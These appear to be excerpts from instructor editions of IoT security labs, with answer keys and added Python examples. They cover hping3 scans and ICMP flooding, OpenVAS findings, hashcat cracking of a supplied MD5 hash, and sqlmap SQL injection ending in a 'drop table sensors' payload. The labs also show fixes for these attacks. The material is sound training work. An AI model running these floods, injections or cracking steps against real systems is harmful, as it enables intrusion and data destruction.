however, hping3 can use its ability to craft packets to attack a target. hping3 is included in Kali or can be
downloaded from http://www.hping.org/. Because hping3 can be used for malicious purposes, avoid using it
on production networks unless you have permission to do so.
Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
j. We will first craft packets to do a port scan against the IP address of your Raspberry Pi.
root@kali:~# hping3 -8 0-100 -S 203.0.113.13
Refer to the Wireshark capture, the man pages, and other sources on the Internet. What do the options -8,
0-100, and -S do?
____________________________________________________________________________________
____________________________________________________________________________________
-8 selects scan mode, 0-100 is the port range to be scanned, and -S sets the SYN flag on the scan packets.
What ports are shown as open?
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 will be open at minimum.
k. Expand your scan to include ports up to 1000.
root@kali:~# hping3 -8 0-1000 -S 203.0.113.13
Did you find any additional ports?
____________________________________________________________________________________
No
What TCP flag was set in the packets shown in Wireshark?
____________________________________________________________________________________
SYN
f. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
g. Repeat the hping3 command above, but this time send ICMP code 17.
h. Review the Wireshark results. Which ICMP message was sent?
____________________________________________________________________________________
Address Mask Request
g. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the display filter that specifies the Kali VM as the source and the Raspberry Pi as the destination,
as was done previously in this lab.
h. In the Kali VM terminal, enter the hping3 command to send a flood attack.
root@kali:~# hping3 --flood --icmp -p 22 203.0.113.13
Look at Wireshark what type of ICMP messages are you seeing?
____________________________________________________________________________________
Type 8 echo request
i. Press Ctrl-C to stop the flood.
j. Complete the following table for the hping3 options that you used in this lab. Use the hping3 man page or
other information resources.
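An added Python example (not part of the lab, and not hping3 or Nmap code) that decodes the ICMP messages these labs generate on the wire: the Echo Request (type 8) seen during the flood, the Address Mask Request (type 17, RFC 950) from Part 2, and the Destination Unreachable / Port Unreachable (type 3, code 3) replies that the Nmap UDP scan in the previous lab relies on. It verifies the RFC 1071 checksum over the whole message and applies Nmap's -sU interpretation: port unreachable means closed, the administratively-prohibited codes mean filtered, a UDP answer means open, and silence means open|filtered. The sample messages are constructed inside the block rather than captured, and the builder exists only to produce them.

```python
import struct

# ICMP types and destination-unreachable codes referenced in these labs.
ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 8: "Echo Request",
              17: "Address Mask Request", 18: "Address Mask Reply"}
UNREACH_CODES = {0: "Net Unreachable", 1: "Host Unreachable", 2: "Protocol Unreachable",
                 3: "Port Unreachable", 9: "Net Admin Prohibited",
                 10: "Host Admin Prohibited", 13: "Communication Admin Prohibited"}


def rfc1071_checksum(data):
    """Internet checksum: ones'-complement sum of 16-bit words, zero-padded if odd length."""
    if len(data) % 2:
        data = data + b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest=b"\x00" * 4, payload=b""):
    """Assemble an ICMP message with a correct checksum (used here only to make sample bytes)."""
    body = rest + payload
    csum = rfc1071_checksum(struct.pack("!BBH", icmp_type, code, 0) + body)
    return struct.pack("!BBH", icmp_type, code, csum) + body


def parse_icmp(pkt):
    """Decode the 8-byte ICMP header and verify the checksum over the whole message."""
    if len(pkt) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    t, c, _ = struct.unpack("!BBH", bytes(pkt[:4]))
    name = ICMP_TYPES.get(t, "type %d" % t)
    if t == 3:
        name += " / " + UNREACH_CODES.get(c, "code %d" % c)
    # A message whose checksum is intact sums to zero when the checksum field is included.
    return {"type": t, "code": c, "name": name,
            "checksum_ok": rfc1071_checksum(bytes(pkt)) == 0}


def udp_port_state(reply):
    """Nmap's -sU interpretation of what came back for a UDP probe.
    reply is None (nothing), b"udp:..." (a UDP answer) or raw ICMP message bytes."""
    if reply is None:
        return "open|filtered"           # silence: open service, or dropped by a filter
    if bytes(reply).startswith(b"udp:"):
        return "open"
    icmp = parse_icmp(reply)
    if icmp["type"] == 3 and icmp["code"] == 3:
        return "closed"                  # Port Unreachable
    if icmp["type"] == 3 and icmp["code"] in (1, 2, 9, 10, 13):
        return "filtered"
    return "unknown"


def flip_byte(pkt, index):
    """Corrupt one byte, to show the checksum check catching a damaged message."""
    b = bytearray(pkt)
    b[index] ^= 0xFF
    return bytes(b)


# Constructed sample messages (not captured): what the labs above produce on the wire.
SAMPLES = {
    "flood": build_icmp(8, 0, rest=b"\x12\x34\x00\x01", payload=b"hping3-data"),
    "mask_request": build_icmp(17, 0, rest=b"\x12\x34\x00\x01", payload=b"\x00" * 4),
    "udp_closed": build_icmp(3, 3, payload=b"\x45\x00" + b"\x00" * 26),  # IP hdr + 8 bytes
}

if __name__ == "__main__":
    for label, pkt in SAMPLES.items():
        print(label, parse_icmp(pkt))
    print("udp probe ->", udp_port_state(SAMPLES["udp_closed"]))
```

For a detection engineer the useful signals are the same ones decoded here: a burst of type 8 from one source with identical identifiers is the flood, and Address Mask Requests almost never occur in normal traffic.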
Lab – Use OpenVAS for Vulnerability Assessment (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Addressing Table
Objectives
Part 1: Exploring OpenVAS
Part 2: Configuring a Vulnerability Scan
Part 3: Reviewing the Results
Background / Scenario
As we know, IoT devices, especially those designed for the home, frequently include WWW applications that
are accessed from the Internet. These applications are a significant part of the IoT system attack surface. A
vulnerable WWW application could allow hackers to take over a home automation application and cause
damage to property, for example.
Open Vulnerability Assessment System (OpenVAS) is a framework that provides services and tools for web
application vulnerability scanning and management. Network Vulnerability Tests (NVT) are used by OpenVAS
to check for existing security issues. NVTs are developed based on Common Vulnerabilities and Exposures
(CVE).
CVE is a collection of publicly known security vulnerabilities that is available on the Internet. The
vulnerabilities are divided into two categories: vulnerabilities and exposures. The entries provide an
identification number, a description, and public references regarding the cybersecurity vulnerabilities. The
goal of the CVE is to enable the sharing of data across different vulnerability tools, repositories, and services.
CVE entries are used by the Common Vulnerability Scoring System (CVSS) as examples.
The CVSS provides an open and standardized way for scoring vulnerabilities. The scoring system allows an
organization to prioritize which vulnerabilities to fix and assess the impact of the vulnerabilities on their
systems. CVE and CVSS can be used together, however they are different systems.
In this lab, you will use OpenVAS to perform a vulnerability scan on the intentionally vulnerable Metasploitable
VM web application and review the vulnerability assessment report from the scan.
Required Resources
• Host computer with at least 4 GB of RAM and 15 GB of free disk space
• Oracle VirtualBox
• IoT Security Kali and Metasploitable VMs
b. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu.
c. When the New Target dialog box appears, enter the following information:
Name: Metasploitable VM
Hosts Manual: 203.0.113.5
Alive Test: Consider Alive.
d. Click Create. This process discovers targets that can be scanned in an OpenVAS task.
Answers will vary. Example: TCP timestamps allows a user to determine the uptime of a computer.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The TCP timestamps can be disabled.
Linux: add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at
runtime.
Windows (excluding Server 2008 and Vista): execute 'netsh int tcp set global timestamps=disabled'
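The finding above rests on one observable: a host that answers a SYN with a TCP Timestamps option (kind 8) is exposing a TSval counter that ticks at a fixed rate since boot. The following added Python example (not OpenVAS code, and not from the lab) parses the options field of a TCP segment and reports whether timestamps are present, so the same check can be made on a captured SYN-ACK before and after applying the sysctl change. The option bytes are constructed for the example; the uptime estimate needs the target's tick rate, which is an assumption the caller has to supply.

```python
import struct

OPT_EOL, OPT_NOP, OPT_MSS, OPT_WSCALE, OPT_SACK_OK, OPT_TIMESTAMP = 0, 1, 2, 3, 4, 8

# Constructed option bytes from a SYN-ACK (not a real capture):
# MSS 1460, SACK permitted, Timestamps (TSval, TSecr), NOP, Window scale 7, EOL padding.
SYNACK_OPTS = (b"\x02\x04\x05\xb4" + b"\x04\x02" + b"\x08\x0a" + struct.pack("!II", 123456789, 0)
               + b"\x01" + b"\x03\x03\x07" + b"\x00\x00\x00")
# The same host after net.ipv4.tcp_timestamps = 0: no kind-8 option at all.
NO_TS_OPTS = b"\x02\x04\x05\xb4" + b"\x01\x01" + b"\x04\x02"


def parse_tcp_options(opts):
    """Walk the option bytes that follow the 20-byte fixed TCP header: (kind, data) per option."""
    parsed, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == OPT_EOL:
            break                                  # rest of the field is padding
        if kind == OPT_NOP:
            parsed.append((kind, b""))
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option kind %d is truncated" % kind)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad length %d for option kind %d" % (length, kind))
        parsed.append((kind, bytes(opts[i + 2:i + length])))
        i += length
    return parsed


def options_well_formed(opts):
    """True if the option field parses without a truncated or mis-sized option."""
    try:
        parse_tcp_options(opts)
        return True
    except ValueError:
        return False


def tcp_timestamps(opts):
    """Return (enabled, tsval, tsecr). TSval is the value that leaks uptime."""
    for kind, data in parse_tcp_options(opts):
        if kind == OPT_TIMESTAMP and len(data) == 8:
            tsval, tsecr = struct.unpack("!II", data)
            return True, tsval, tsecr
    return False, None, None


def estimate_uptime_seconds(tsval, ticks_per_second):
    """Uptime if the timestamp clock started at boot; the tick rate is an assumption."""
    return tsval / float(ticks_per_second)


if __name__ == "__main__":
    print("before:", tcp_timestamps(SYNACK_OPTS))
    print("after: ", tcp_timestamps(NO_TS_OPTS))
```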
Severity: Low
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: Medium
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
e. Locate the OS End of Life Detection vulnerability. Investigate this vulnerability by clicking it and
exploring the explanation. What is this vulnerability and why is it a security vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
The OS running on Metasploitable is Ubuntu 8.04. This OS went end of life in May of 2013. This means
that security patches for the OS are not being created and distributed. This means that vulnerabilities for
this version that have been discovered since it went EOL could be exploited by hackers.
f. Investigate the vulnerability called phpinfo() output accessible. Open the Metasploitable phpinfo page in
your Kali browser. What kind of information contained on that page could be used by hackers?
____________________________________________________________________________________
____________________________________________________________________________________
A large amount of information about PHP is displayed on this page including PHP and module versions,
configuration information, internal IP addresses, etc. This is information that shouldn't be available to
users on the open web.
g. Investigate the vulnerability called /doc directory browsable. Open the /doc directory in your browser.
How could a hacker use this access to attack a system?
____________________________________________________________________________________
____________________________________________________________________________________
They could find out what software and software versions are running on the server.
Lab - Challenge Passwords with Kali Tools (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will explore tools that are available in the Kali VM to challenge passwords.
Part 1: Using Hashcat to Challenge Passwords
Part 2: Investigating Other Password Challenging Tools on Kali Linux
Background / Scenario
There are numerous Kali tools used to challenge passwords. It is very likely you have already seen and/or
used John the Ripper (john). John is a very powerful tool, but there are other tools that might be more
appropriate to use depending on the situation. It is very important to be aware of as many tools as possible so
you can select the most appropriate tool for the task at hand.
Hashcat is a very powerful password challenging tool that offers different features and has other advantages
in comparison to John the Ripper that you might find helpful to know how to use. Hashcat is an offline
password cracking tool that is claimed to be the world’s fastest CPU-based password recovery tool. It offers
various attack modes including dictionary, brute force, and combination attack. For the purposes of this lab,
we will use the combination attack based on the available information. We will be using a combination attack
to recover the password for a serious golf fan.
Required Resources
• PC with IoTSec Kali VM installed
• Internet connection
Step 2: Create the necessary dictionary files and MD5 hash file.
An MD5 hash value has been recovered for a user, and it is your job to crack this value. Rather than using a
brute force method that could take a long time, you will use known information to crack this value much
more quickly. The user is a golf fan and has specifically talked about Tiger Woods. In addition, it was
discovered from one of his public social media profiles that he graduated in 2002.
It is very typical for users to create passwords using words from their special interests or hobbies. When their
special interests are known, wordlists can be very helpful in recovering passwords or cracking hashes. There
are numerous sites out there that provide wordlists for a wide variety of interests. For example:
https://packetstormsecurity.com/Crackers/wordlists/
This site provides a golfers.gz file that contains a list of golf names/words that can be used for a wordlist. It is
also known that users will usually take a name and make the password more complicated by either repeating
the name or word and/or adding numbers or special characters to it.
The following MD5 hash value was provided to you by a known golf fan, and it is your job to crack it:
22bb33653af9cc8f21d71fa0e55751b4
MD5 hash values are written in hexadecimal characters: the digits 0 through 9 and the letters a through f.
For the purposes of this lab, and time constraint issues, we will create our own dictionaries and use just a few
words per dictionary.
a. Create a dictionary file using multiple combinations of “tiger woods”:
root@kali:~/passwordlab# echo "tiger woods" > dict1.txt
root@kali:~/passwordlab# echo "tiger" >> dict1.txt
root@kali:~/passwordlab# echo "woods" >> dict1.txt
root@kali:~/passwordlab# echo "golf" >> dict1.txt
root@kali:~/passwordlab# more dict1.txt
b. The second dictionary file we will create is the file that Hashcat will combine with the first. It is very
common for users to append numbers to their passwords in order to make them longer and to meet
minimum length requirements.
root@kali:~/passwordlab# echo "0" > dict2.txt
root@kali:~/passwordlab# echo "1" >> dict2.txt
root@kali:~/passwordlab# echo "2" >> dict2.txt
root@kali:~/passwordlab# echo "2002" >> dict2.txt
root@kali:~/passwordlab# echo "02" >> dict2.txt
root@kali:~/passwordlab# more dict2.txt
c. Save the MD5 hash value into a text file called hash.txt:
root@kali:~/passwordlab# echo "22bb33653af9cc8f21d71fa0e55751b4" > hash.txt
d. If there are any typos with the hash when entering it, the lab will not work.
What command did you use to view the content in the file hash.txt? _____________________________
more hash.txt
hashcat -a 1
b. The --force option below is required because you are running this on a virtual image.
root@kali:~/passwordlab# hashcat -m 0 -a 1 --force hash.txt dict1.txt dict2.txt
Note: If you want to run this again with the same hash value, use the --potfile-disable option:
root@kali:~/passwordlab# hashcat -m 0 -a 1 --force hash.txt dict1.txt dict2.txt --potfile-disable
c. Review the output from this command and answer the following questions:
What was the recovered password from the MD5 hash? _______________________________________
tiger02
What was the status? __________________________________________________________________
Cracked
How long did it take? ___________________________________________________________________
3 seconds
d. To view the saved passwords from the hash.txt file use the following command:
root@kali:~/passwordlab# hashcat --show hash.txt
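Why the status is Cracked within seconds is easier to see from the arithmetic than from the hashcat output. The following added Python example (not hashcat code and not part of the lab) re-implements the combinator mode (-a 1) used above: every word of dict1.txt concatenated with every word of dict2.txt, hashed with unsalted MD5 (-m 0) and compared against the target. With the two lists from this lab the whole keyspace is 4 x 5 = 20 candidates. The wordlists and the hash value are the ones given in the lab; the main block runs the attack against that hash and prints whatever it recovers.

```python
import hashlib
from itertools import product

# Wordlists exactly as created in Step 2 of this lab (dict1.txt and dict2.txt).
DICT1 = ["tiger woods", "tiger", "woods", "golf"]
DICT2 = ["0", "1", "2", "2002", "02"]
# Hash value given in the lab (hash.txt).
LAB_HASH = "22bb33653af9cc8f21d71fa0e55751b4"


def md5_hex(text):
    """Unsalted MD5 of a candidate, which is what hash mode 0 expects."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def keyspace(left, right):
    """Number of candidates a combinator attack has to try."""
    return len(left) * len(right)


def combinator_attack(target_hex, left, right):
    """Equivalent of hashcat -a 1: hash every left word + right word and compare.
    Returns (recovered_password_or_None, candidates_tried)."""
    target_hex = target_hex.strip().lower()
    tried = 0
    for l_word, r_word in product(left, right):
        tried += 1
        if md5_hex(l_word + r_word) == target_hex:
            return l_word + r_word, tried
    return None, tried


if __name__ == "__main__":
    print("keyspace:", keyspace(DICT1, DICT2))
    found, tried = combinator_attack(LAB_HASH, DICT1, DICT2)
    print("lab hash ->", found, "after", tried, "candidates")
```

The defender's reading of the same numbers: an unsalted, fast hash plus a password assembled from public facts about the user is recoverable in a handful of guesses, regardless of length. A slow, salted password hash (bcrypt, scrypt or Argon2) and a password that is not derived from known interests are the two mitigations the lab points at.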
Lab - Web Application Vulnerability (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi
Objectives
In this lab, you will discover vulnerabilities in a simple Python web application using tools available in the
IoTSec Kali VM. You will exploit the vulnerabilities much as a hacker would. Finally, you will learn how to
address the vulnerabilities.
Part 1: Set up a Simple IoT Monitoring Application
Part 2: Conduct a Reconnaissance Attack
Part 3: Exploit a Vulnerable Web Application
Part 4: Add Application Protection
Background/Scenario
Many IoT systems include web applications that are used to monitor and control IoT devices. These
applications are also used to view data submitted by IoT devices, often through an analytical dashboard.
Many of these applications are accessed across the open Internet. Users authenticate to the application in
order to make use of it. Commercial home IoT devices use web applications to provide users with an easy
way to monitor sensors in their homes and to control actuators such as thermostats, electrical outlets, and
alarms.
Web application vulnerabilities involve system flaws or weaknesses in a web application. These vulnerabilities
can be due to form inputs that have not been validated or sanitized, misconfigured web servers, and
application design flaws. Attackers can exploit these weaknesses to compromise the security of the
application. Attackers can use tools such as Nmap and skipfish to scan for weaknesses. Nmap is a
network exploration tool that can provide information on open ports and operating systems. skipfish is a web
application security scanner. A skipfish scan provides an interactive sitemap by using recursive crawl and
dictionary-based probes.
In this lab, you will exploit a misconfiguration in a simple Python application by using the sqlmap SQL injection
tool that is available in the IoTSec Kali VM. You will discover web application weaknesses and address them by
implementing a Python script that will sanitize application form input.
pi@myPi:~ /.../scripts$ ls
app.py init_mysql.sql (output omitted)
b. Create the application database and tables using the script provided. Please note that during the probing
of the web application the database tables and data might become corrupt. It might be required to re-run
the script to restore the database.
pi@myPi:~ /.../scripts$ sudo mysql < init_mysql.sql
c. The application can then be started from the command line using the following command:
pi@myPi:~ /.../scripts$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
Note: Keep this terminal open. The script must be running for the lab to operate correctly. In addition, do not
attempt to rerun the script from another terminal. Always use the same terminal to run the script.
d. Test the application from the Kali VM by opening a new web browser and connecting to the web page at
the IP address of the Raspberry Pi with port 8080. The example IP address for this lab is 203.0.113.12.
This IP address will be used throughout the lab.
b. To verify that the new data is in the SQL table, navigate to the IP address for your Raspberry Pi at port
8080. Note the number under the No. column. This is the ID used for each post of sensor data. You may
need to refresh your browser window to see newly posted data.
c. Similarly, you can use the update API call to alter the temperature value of the sensor by referring to the
ID number in the data table:
http://203.0.113.12:8080/update/<ID>?temperature=30
where <ID> is replaced with the ID number from the dashboard. In this example, <ID> is 1. Refresh your
browser to see the updated results.
Do research on the web to answer the following questions. What vulnerability was recently discovered in
this web server software? Which company was compromised by an exploit of this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
It was possible to inject code to open the Python debug console. Users were able to steal data from
there. The company was Patreon.
c. To discover the type and name of the database used by the web application, run the following command
and answer the prompts as shown below. This could take a few minutes. You can also observe the
messages on the SSH session.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbs
--threads=10 --current-db
< output omitted >
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads
specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL'
extending provided level (1) and risk (1) values? [Y/n] n
< output omitted >
GET parameter 'temperature' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 93 HTTP(s)
requests:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:45:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:36] [INFO] fetching current database
< some output omitted >
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[13:45:58] [INFO] adjusting time delay to 1 second due to good response times
vulnSensors
current database: 'vulnSensors'
[13:46:39] [INFO] fetching database names
[13:46:39] [INFO] fetching number of databases
[13:46:39] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
2
[13:46:42] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
information_schema
[13:47:46] [INFO] retrieved: vulnSensors
d. The database type has been discovered as MySQL and the name as vulnSensors. We can also search
for the existing tables in that database. Respond to the prompt as shown below.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbms=mysql -D vulnSensors --tables
< output omitted >
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:51:58] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
< output omitted >
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:53:54] [INFO] fetching tables for database: 'vulnSensors'
[13:53:54] [INFO] fetching number of tables for database 'vulnSensors'
< output omitted >
[1 table]
+---------+
| sensors |
+---------+
< output omitted >
While sqlmap is running, you can view the queries it sends in the PL-App terminal. After a browser refresh,
you can also see that multiple sensor entries have been added.
So far, sqlmap has allowed us to discover that the database system is MySQL, the database name is
vulnSensors, and the table used for storing data is sensors.
Note: There is a space between the second hyphen (-) and the end quote (") at the end of the command.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "
This will delete the “sensors” table and make the web application unusable. Refresh the web browser to
verify that the sensors table is no longer available. At this point, the web application has become unusable.
No sensors will be able to post data to the application and users will not be able to monitor the IoT system. A
hacker has successfully exploited a vulnerability in the web application using an SQL injection attack.
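The following added example (not part of the lab's own application code) reproduces the mechanics of the attack above in Python against an in-memory SQLite stand-in for the vulnSensors database, so it can be run offline. The vulnerable handler builds the INSERT by string formatting, as the lab's application does; the hardened handler passes the same values as bound parameters. The table and column names follow the lab. Using SQLite instead of MySQL/MariaDB, and calling executescript so that stacked statements run, are assumptions made to model the multi-statement behaviour the drop-table payload relies on.

```python
import sqlite3

# Constructed stand-in for the lab's vulnSensors database and its `sensors` table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE sensors (id INTEGER PRIMARY KEY, name TEXT, temperature TEXT);"
        "INSERT INTO sensors (name, temperature) VALUES ('test', '26');"
    )
    return conn

def add_reading_vulnerable(conn, name, temperature):
    """Builds the INSERT by string formatting, as the lab's application does.
    executescript() is used (assumption) so that stacked statements execute, which
    models the multi-statement behaviour the lab's payload depends on."""
    sql = ("INSERT INTO sensors (name, temperature) VALUES ('%s', '%s');"
           % (name, temperature))
    conn.executescript(sql)

def add_reading_safe(conn, name, temperature):
    """Parameterised query: values are bound separately from the SQL text, so a
    quote or semicolon inside `temperature` is stored as data, never executed."""
    conn.execute("INSERT INTO sensors (name, temperature) VALUES (?, ?)",
                 (name, temperature))
    conn.commit()

def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (table,)
    ).fetchone()
    return row is not None

# URL-decoded form of the lab's wget payload: 1%27);drop%20table%20sensors;--%20
PAYLOAD = "1');drop table sensors;-- "

def demo():
    """Run the same payload through both handlers and report what survived."""
    vulnerable = make_db()
    add_reading_vulnerable(vulnerable, "1", PAYLOAD)   # drops the table

    hardened = make_db()
    add_reading_safe(hardened, "1", PAYLOAD)           # stores the payload as text
    stored = hardened.execute(
        "SELECT temperature FROM sensors WHERE name='1'").fetchone()[0]

    return {"vulnerable_table_survives": table_exists(vulnerable, "sensors"),
            "hardened_table_survives": table_exists(hardened, "sensors"),
            "hardened_stored_value": stored}
```

In the vulnerable path the formatted statement becomes `INSERT ... VALUES ('1', '1');drop table sensors;-- ');`, so the comment swallows the closing quote and parenthesis and the DROP runs as a second statement. The hardened path stores the entire payload, quotes and all, as the temperature string.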
To Action From
-- ------ ----
22/tcp ALLOW Anywhere
8080/tcp LIMIT Anywhere
80/tcp ALLOW Anywhere
22/tcp (v6) ALLOW Anywhere (v6)
8080/tcp (v6) LIMIT Anywhere (v6)
80/tcp (v6) ALLOW Anywhere (v6)
e. To view the log messages in real time when you perform the SQL injection, use the command tail -f
filename in a new SSH session into the Raspberry Pi from the Kali VM. Press Ctrl-C to stop the display when
finished.
pi@myPi:~ $ tail -f /var/log/kern.log
f. Issue the following command to perform an SQL injection again from the Kali VM terminal. You may need
to run it more than once to see the UFW log messages in the SSH session running tail.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbms=mysql -D vulnSensors --tables
g. After the SQL injection, you will see log messages issued by ufw.
<output omitted>
May 25 11:22:51 locahost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT=
MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00:45:00:00:3c:d7:a6:40:00:40:06:da:ee
SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF
PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
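The ufw entries above are plain key=value pairs, so they are easy to turn into a detection feed. The following added example (not from the lab) parses log lines in that format and counts blocked connection attempts per source address and destination port, distinguishing rate-limit blocks from ordinary blocks. The sample lines are constructed: the first mirrors the entry above, and the extra source 203.0.113.77 and the unrelated kernel line are there to show what the parser ignores.

```python
import re
from collections import Counter

# Constructed sample in the format ufw writes to /var/log/kern.log. Line 1 mirrors the
# entry shown in the lab; lines 2-4 are added to exercise the parser.
SAMPLE_LOG = """\
May 25 11:22:51 localhost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:22:51 localhost kernel: [16954.671203] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55207 DF PROTO=TCP SPT=56188 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:22:52 localhost kernel: [16955.001122] [UFW BLOCK] IN=eth0 OUT= MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00 SRC=203.0.113.77 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40000 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
May 25 11:22:53 localhost kernel: [16956.000000] usb 1-1: new high-speed USB device number 4
"""

# Matches the ufw tag ("LIMIT BLOCK", "BLOCK", "AUDIT", ...) and everything after it.
UFW_RE = re.compile(r"\[UFW (?P<action>[A-Z ]+)\] (?P<fields>.*)$")

def parse_ufw_line(line):
    """Return a dict of the ufw fields, or None if the line is not a ufw entry."""
    m = UFW_RE.search(line)
    if not m:
        return None
    rec = {"action": m.group("action").strip()}
    for token in m.group("fields").split():
        if "=" in token:
            key, _, value = token.partition("=")
            rec[key] = value            # e.g. SRC, DST, DPT; OUT= yields an empty string
        else:
            rec[token] = True           # bare flags such as DF and SYN
    return rec

def summarize(log_text):
    """Count blocked attempts keyed by (source, destination port, ufw action)."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_ufw_line(line)
        if rec and "BLOCK" in rec["action"]:
            counts[(rec["SRC"], rec["DPT"], rec["action"])] += 1
    return counts
```

Run over the tail of kern.log during the sqlmap step, the `LIMIT BLOCK` count for the Kali address on port 8080 is what tells you the rate limit, not the application, stopped the scan.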
h. Exit sqlmap with Ctrl-C if necessary. Run the skipfish command again with a different output folder name.
You should see UFW log messages in the PL-App terminal that show that skipfish was blocked.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results1 http://203.0.113.12:8080
i. It will take some time for skipfish to run. After the skipfish scan is complete, in a web browser on the Kali
VM, navigate to file:///root/<folder name>/index.html. In this example, it is
g. Refresh the web browser associated with your web application. What happened to the sensors table after
the drop table attack?
____________________________________________________________________________________
The table is still displaying.
Part 5: Clean Up
In this part of the lab you will return the Raspberry Pi to its default configuration.
Step 1: Remove the UFW rules that were created in this lab.
You can delete the rules by issuing the ufw reset command. This will deactivate ufw and remove all rules.
(pl-app) root@myPi:/home/pi/notebooks# ufw reset
Resetting all rules to installed defaults. Proceed with operation (y|n)? y
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181220_152657'
Backing up 'user.rules' to '/etc/ufw/user.rules.20181220_152657'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181220_152657'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181220_152657'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181220_152657'
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181220_152657'
Lab - Hacking MQTT (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Required Resources
3 Raspberry Pi 3 devices, Model B or later
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi Devices
A Network Switch
Objectives
